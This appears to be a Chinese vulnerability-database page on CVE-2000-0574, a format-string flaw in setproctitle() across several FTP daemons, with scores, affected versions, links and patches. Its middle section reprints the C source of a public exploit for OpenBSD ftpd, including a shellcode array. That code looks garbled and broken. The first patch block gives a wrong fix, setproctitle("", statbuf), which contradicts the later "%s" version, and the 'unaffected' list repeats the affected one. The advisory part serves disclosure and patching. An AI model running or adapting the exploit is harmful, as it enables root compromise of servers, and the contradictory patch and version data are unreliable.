CVE-2000-0574
CVSS5.0
发布时间 :2000-07-07 00:00:00
修订时间 :2008-09-10 15:05:03
NMCOES    

[原文]FTP servers such as OpenBSD ftpd, NetBSD ftpd, ProFTPd and Opieftpd do not properly cleanse untrusted format strings that are used in the setproctitle function (sometimes called by set_proc_title), which allows remote attackers to cause a denial of service or execute arbitrary commands.


[CNNVD]多个供应商ftpd setproctitle()格式字符串漏洞(CNNVD-200007-014)

        例如OpenBSD ftpd,NetBSD ftpd,ProFTPd和Opieftpd的FTP服务器不能正确净化在setproctitle函数(有时被称作set_proc_title)中被使用的不可信格式字符串,远程攻击者可以导致服务拒绝或者执行任意命令。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:washington_university:wu-ftpd:2.4.2_vr16
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr15
cpe:/a:washington_university:wu-ftpd:2.4.2_vr17
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr12
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr14
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr9
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr7
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18::academ
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr10
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr13
cpe:/a:washington_university:wu-ftpd:2.4.2_beta1::academ
cpe:/a:openbsd:ftpd:5.60OpenBSD ftpd 5.60
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr4
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr5
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr8
cpe:/a:openbsd:ftpd:5.51OpenBSD ftpd 5.51
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr11
cpe:/a:washington_university:wu-ftpd:2.4.2_beta18_vr6
cpe:/a:washington_university:wu-ftpd:2.5
cpe:/a:washington_university:wu-ftpd:2.6

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0574
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0574
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200007-014
(官方数据源) CNNVD

- 其它链接及资源

http://www.cert.org/advisories/CA-2000-13.html
(VENDOR_ADVISORY)  CERT  CA-2000-13
http://www.securityfocus.com/bid/1438
(UNKNOWN)  BID  1438
http://www.securityfocus.com/bid/1425
(UNKNOWN)  BID  1425
http://archives.neohapsis.com/archives/bugtraq/2000-07/0121.html
(UNKNOWN)  BUGTRAQ  20000710 opieftpd setproctitle() patches
http://archives.neohapsis.com/archives/bugtraq/2000-07/0061.html
(UNKNOWN)  BUGTRAQ  20000706 ftpd and setproctitle()
http://archives.neohapsis.com/archives/bugtraq/2000-07/0031.html
(UNKNOWN)  BUGTRAQ  20000705 proftp advisory
ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/advisories/NetBSD-SA2000-009.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2000-009

- 漏洞信息

多个供应商ftpd setproctitle()格式字符串漏洞
中危 格式化字符串
2000-07-07 00:00:00 2006-09-20 00:00:00
远程  
        例如OpenBSD ftpd,NetBSD ftpd,ProFTPd和Opieftpd的FTP服务器不能正确净化在setproctitle函数(有时被称作set_proc_title)中被使用的不可信格式字符串,远程攻击者可以导致服务拒绝或者执行任意命令。

- 公告与补丁

        
        OpenBSD ftpd:
        A patch is available at
        http://www.openbsd.org/errata.html#ftpd
        ProFTPD:
        Upgrade to ProFTPD 1.2.0 when it is available.
        Manual patch:
        Replace the call to setproctitle() in the set_proc_title() with a properly used format string.
        Replace:
        setproctitle(statbuf);
        with
        setproctitle("", statbuf);
        wu-ftpd - upgrade to version 2.6.1:
        ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz
        ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz.asc
        ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z
        ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z.asc
        SuSE Linux - updates are available.
        http://suse.de/de/support/security/suse_security_announce_571.txt
        Debian:
        This problem has been corrected in netstd 3.07-7slink.4 for Debian 2.1 (slink) and in ftpd 0.11-8potato.1 for Debian 2.2 (potato). We recommend upgrading your ftpd immediately.
        Fixed in: Debian 2.1 (slink):
        Source:
        http://security.debian.org/dists/slink/updates/source/netstd_3.07-7slink.4.diff.gz
        http://security.debian.org/dists/slink/updates/source/netstd_3.07-7slink.4.dsc
        http://security.debian.org/dists/slink/updates/source/netstd_3.07.orig.tar.gz
        alpha:
        http://security.debian.org/dists/slink/updates/binary-alpha/netstd_3.07-7slink.4_alpha.deb
        i386:
        http://security.debian.org/dists/slink/updates/binary-i386/netstd_3.07-7slink.4_i386.deb
        m68k:
        http://security.debian.org/dists/slink/updates/binary-m68k/netstd_3.07-7slink.4_m68k.deb
        sparc:
        http://security.debian.org/dists/slink/updates/binary-sparc/netstd_3.07-7slink.4_sparc.deb
        Debian 2.2 (potato):
        Source:
        http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11-8potato.1.diff.gz
        http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11-8potato.1.dsc
        http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11.orig.tar.gz
        arm:
        http://security.debian.org/dists/potato/updates/main/binary-arm/ftpd_0.11-8potato.1_arm.deb
        i386:
        http://security.debian.org/dists/potato/updates/main/binary-i386/ftpd_0.11-8potato.1_i386.deb
        sparc:
        http://security.debian.org/dists/potato/updates/main/binary-sparc/ftpd_0.11-8potato.1_sparc.deb
        ProFTPD Project ProFTPD 1.2 pre4
        
        ProFTPD Project ProFTPD 1.2 pre5
        
        ProFTPD Project ProFTPD 1.2 pre8
        
        ProFTPD Project ProFTPD 1.2 pre6
        
        ProFTPD Project ProFTPD 1.2 pre1
        

- 漏洞信息 (396)

OpenBSD ftp Exploit (teso) (EDBID:396)
bsd local
2002-01-01 Verified
0 Teso
N/A [点击下载]
/* 7350-crocodile - x86/OpenBSD ftp exploit
 *
 * by lorian and scut / TESO=20
 * 
 *
 * TESO CONFIDENTIAL - SOURCE MATERIALS
 *
 * This is unpublished proprietary source code of TESO Security.
 *
 * The contents of these coded instructions, statements and computer
 * programs may not be disclosed to third parties, copied or duplicated in
 * any form, in whole or in part, without the prior written permission of
 * TESO Security. This includes especially the Bugtraq mailing list, the
 * www.hack.co.za website and any public exploit archive.
 *
 * (C) COPYRIGHT TESO Security, 2002
 * All Rights Reserved
 *
 *****************************************************************************
 *
 * greetz: synnergy, GOBBLES Security
 *
 */

#include <stdio.h>
#include <string.h>
#define RET 0xbfffeb30


#define VERSION  "0.2.0"
#define USERNAME "anonymous"
#define PASSWORD "guest@"


char shellcode[] =

"\x32\xdb\x81\xd1\xb1\x72\xcd\x83"
"\x21\x21\x31\xc2\x32\xdb\xb5\x27"
"\xcd\x71\x23\xc2\xb3\x72\xcd\x81"
"\x32\xc1\x12\xdb\xb4\x3e\xcd\x81"
"\xeb\x4f\x35\xc2\x31\xc1\x5e\xb1"
"\x32\x7d\x5e\x98\xfe\xc2\xb8\xed"
"\xcd\x79\x38\xc1\x1d\x3e\x18\xb1"
"\x3d\xcd\x82\x32\xc1\xbb\xd2\xd2"
"\xd2\xff\xf2\xdb\x39\xc1\xb2\x11"
"\x56\x75\xce\x82\x0e\x81\xc9\x13"
"\xe5\xf2\x1e\xb5\x0d\x8d\x1e\x11"
"\xcd\x21\x31\xc2\x09\x42\x21\x19"
"\x70\x48\x21\x41\x9c\xb3\x2b\x81"
"\xf1\x2d\x2e\x18\x1d\x32\x7c\xcd"
"\x82\xe2\xac\xff\xff\xff";

void mkd(char *dir)
{
        char blah[2048], *p;
        int n;
        bzero(blah, sizeof(blah));

        p = blah;
         for(n=1; n<strlen(dir); n++){
                if(dir[n] == '\xff'){
                        *p = '\xff';
                        p++;
                }
                *p = dir[n];
                p++;
        }

        printf("MKD %s\r\n", blah);
        printf("CWD %s\r\n", blah);
}

void
main (int argc, char *argv[])
{

char *buf;
char buf2[200];
char buf1[400];
char dir2[255];
char *p;
char *q;
char tmp[255];
int a;
int offset;
int i;

  if (argc > 0) offset = atoi(argv[0]);
    else offset = 1;

fprintf(stderr, "ret-addr = 0x%x\n", RET + offset);
fprintf(stderr, "shell size = %d\n", sizeof(shellcode));

dir2[231] = '\1';
memset(dir2, '\x70', 255);

        printf("user %s\r\n", USERNAME);
        printf("pass %s\r\n", PASSWORD);
        printf("cwd %s\r\n", argv[2]);

memset(buf1, 0x50, 150);
p = &buf1[sizeof(argv[0])];
q = &buf1[399];
*q = '\x00';
while(q <= p) {
        strncpy(tmp, p, 80);
        mkd(tmp);
        p+=255; }

        mkd(dir2);
        mkd(shellcode);
        mkd("bin");
        mkd("sh");

        memset(buf2, 0x30, 40);
// var 96
for(i=4; i<20; i+=4)
        *(long *)&buf2[i+1] = RET;
p = &buf2[0];
q = &buf2[50];
strncpy(tmp, p, 20);
 mkd(tmp);
 printf("pwd\r\n");
}


// milw0rm.com [2002-01-01]
		

- 漏洞信息

7541
Multiple FTP Server setproctitle Function Arbitrary Command Execution
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2000-07-05 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor ftpd setproctitle() Format String Vulnerability
Input Validation Error 1425
Yes No
2000-07-05 12:00:00 2009-07-11 02:56:00
This vulnerability was posted to the Bugtraq mailing list on July 5, 2000 by lamagra < lamagra@digibel.org>

- 受影响的程序版本

S.u.S.E. Linux 6.4 ppc
S.u.S.E. Linux 6.4 alpha
S.u.S.E. Linux 6.4
S.u.S.E. Linux 6.3 ppc
S.u.S.E. Linux 6.3 alpha
S.u.S.E. Linux 6.3
S.u.S.E. Linux 6.2
S.u.S.E. Linux 6.1
S.u.S.E. Linux 6.0
ProFTPD Project ProFTPD 1.2 pre9
ProFTPD Project ProFTPD 1.2 pre8
ProFTPD Project ProFTPD 1.2 pre7
ProFTPD Project ProFTPD 1.2 pre6
ProFTPD Project ProFTPD 1.2 pre5
ProFTPD Project ProFTPD 1.2 pre4
ProFTPD Project ProFTPD 1.2 pre3
ProFTPD Project ProFTPD 1.2 pre2
ProFTPD Project ProFTPD 1.2 pre10
ProFTPD Project ProFTPD 1.2 pre1
opieftpd ftp 1.3
OpenBSD OpenBSD 2.7
OpenBSD OpenBSD 2.6
OpenBSD OpenBSD 2.5
OpenBSD OpenBSD 2.4
OpenBSD OpenBSD 2.3
OpenBSD OpenBSD 2.2
OpenBSD OpenBSD 2.1
OpenBSD OpenBSD 2.0
NetBSD NetBSD 1.4.2 x86
NetBSD NetBSD 1.4.2 SPARC
NetBSD NetBSD 1.4.2 arm32
NetBSD NetBSD 1.4.2 Alpha
NetBSD NetBSD 1.4.1 x86
NetBSD NetBSD 1.4.1 SPARC
NetBSD NetBSD 1.4.1 arm32
NetBSD NetBSD 1.4.1 Alpha
NetBSD NetBSD 1.4 x86
NetBSD NetBSD 1.4 SPARC
NetBSD NetBSD 1.4 arm32
NetBSD NetBSD 1.4 Alpha
NetBSD NetBSD 1.3.3
NetBSD NetBSD 1.3.2
NetBSD NetBSD 1.3.1
NetBSD NetBSD 1.3
NetBSD NetBSD 1.2.1
NetBSD NetBSD 1.2
NetBSD NetBSD 1.1
NetBSD NetBSD 1.0
Linux ftpd 0.16
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
FreeBSD FreeBSD 2.1.7 .1
FreeBSD FreeBSD 2.1.6 .1
FreeBSD FreeBSD 2.1.6
FreeBSD FreeBSD 2.1.5
FreeBSD FreeBSD 2.1
FreeBSD FreeBSD 2.0.5
FreeBSD FreeBSD 2.0
FreeBSD FreeBSD 1.1.5 .1
Debian Linux 2.2
Debian Linux 2.1
SGI IRIX 6.5.8
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
SGI IRIX 6.1
SGI IRIX 6.0
SGI IRIX 5.3
SGI IRIX 5.2
SGI IRIX 5.1
SGI IRIX 5.0
SGI IRIX 4.0
SGI IRIX 3.3
SGI IRIX 3.2
ProFTPD Project ProFTPD 1.2
+ Cobalt Qube 3.0
+ Cobalt Qube 2.0
+ Cobalt RaQ 3.0
+ Cobalt RaQ 2.0
+ Cobalt RaQ 1.1
Linux ndis-wrapper 1.28 RC2
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5
FreeBSD FreeBSD 3.4
FreeBSD FreeBSD 3.3
FreeBSD FreeBSD 3.2
FreeBSD FreeBSD 3.1
FreeBSD FreeBSD 3.0
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 2.2

- 不受影响的程序版本

SGI IRIX 6.5.8
SGI IRIX 6.5
SGI IRIX 6.4
SGI IRIX 6.3
SGI IRIX 6.2
SGI IRIX 6.1
SGI IRIX 6.0
SGI IRIX 5.3
SGI IRIX 5.2
SGI IRIX 5.1
SGI IRIX 5.0
SGI IRIX 4.0
SGI IRIX 3.3
SGI IRIX 3.2
ProFTPD Project ProFTPD 1.2
+ Cobalt Qube 3.0
+ Cobalt Qube 2.0
+ Cobalt RaQ 3.0
+ Cobalt RaQ 2.0
+ Cobalt RaQ 1.1
Linux ndis-wrapper 1.28 RC2
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.0 alpha
FreeBSD FreeBSD 4.0
FreeBSD FreeBSD 3.5
FreeBSD FreeBSD 3.4
FreeBSD FreeBSD 3.3
FreeBSD FreeBSD 3.2
FreeBSD FreeBSD 3.1
FreeBSD FreeBSD 3.0
FreeBSD FreeBSD 2.2.8
FreeBSD FreeBSD 2.2.6
FreeBSD FreeBSD 2.2.5
FreeBSD FreeBSD 2.2.4
FreeBSD FreeBSD 2.2.3
FreeBSD FreeBSD 2.2.2
FreeBSD FreeBSD 2.2

- 漏洞讨论

A number of ftp daemons, including versions of wu-ftpd, OpenBSD ftpd (ports of this package are distributed with some Linux distributions), HP-UX ftpd, and proftpd, have a vulnerability caused by the passing of user input to the set_proc_title() function. This function in turn calls setproctitle() after using this user data to generate a buffer to pass to setproctitle. setproctitle is defined as setproctitle(char *fmt, ...). The buffer created is passed as the format argument to setproctitle. setproctitle will make a call to the vsnprintf() call, taking the buffer passed as the format string. By carefully manipulating the contents of this buffer, a remote user can cause values on the stack to be overwritten, and potentially cause arbitrary code to be executed as root.

- 漏洞利用

Currently the SecurityFocus staff are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 解决方案


OpenBSD ftpd:
A patch is available at http://www.openbsd.org/errata.html#ftpd

ProFTPD:
Upgrade to ProFTPD 1.2.0 when it is available.

Manual patch:
Replace the call to setproctitle() in the set_proc_title() with a properly used format string.
Replace:
setproctitle(statbuf);
with
setproctitle("%s", statbuf);

wu-ftpd - upgrade to version 2.6.1:
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.gz.asc
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/wu-ftpd-2.6.1.tar.Z.asc

SuSE Linux - updates are available.
http://suse.de/de/support/security/suse_security_announce_571.txt

Debian:
This problem has been corrected in netstd 3.07-7slink.4 for Debian 2.1 (slink) and in ftpd 0.11-8potato.1 for Debian 2.2 (potato). We recommend upgrading your ftpd immediately.

Fixed in: Debian 2.1 (slink):
Source:
http://security.debian.org/dists/slink/updates/source/netstd_3.07-7slink.4.diff.gz
http://security.debian.org/dists/slink/updates/source/netstd_3.07-7slink.4.dsc
http://security.debian.org/dists/slink/updates/source/netstd_3.07.orig.tar.gz
alpha:
http://security.debian.org/dists/slink/updates/binary-alpha/netstd_3.07-7slink.4_alpha.deb
i386:
http://security.debian.org/dists/slink/updates/binary-i386/netstd_3.07-7slink.4_i386.deb
m68k:
http://security.debian.org/dists/slink/updates/binary-m68k/netstd_3.07-7slink.4_m68k.deb
sparc:
http://security.debian.org/dists/slink/updates/binary-sparc/netstd_3.07-7slink.4_sparc.deb
Debian 2.2 (potato):
Source:
http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11-8potato.1.diff.gz
http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11-8potato.1.dsc
http://security.debian.org/dists/potato/updates/main/source/linux-ftpd_0.11.orig.tar.gz
arm:
http://security.debian.org/dists/potato/updates/main/binary-arm/ftpd_0.11-8potato.1_arm.deb
i386:
http://security.debian.org/dists/potato/updates/main/binary-i386/ftpd_0.11-8potato.1_i386.deb
sparc:
http://security.debian.org/dists/potato/updates/main/binary-sparc/ftpd_0.11-8potato.1_sparc.deb


ProFTPD Project ProFTPD 1.2 pre4

ProFTPD Project ProFTPD 1.2 pre5

ProFTPD Project ProFTPD 1.2 pre8

ProFTPD Project ProFTPD 1.2 pre6

ProFTPD Project ProFTPD 1.2 pre1

ProFTPD Project ProFTPD 1.2 pre9

ProFTPD Project ProFTPD 1.2 pre7

ProFTPD Project ProFTPD 1.2 pre3

ProFTPD Project ProFTPD 1.2 pre2

ProFTPD Project ProFTPD 1.2 pre10

opieftpd ftp 1.3

HP HP-UX 10.10

HP HP-UX 10.20

HP HP-UX 11.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站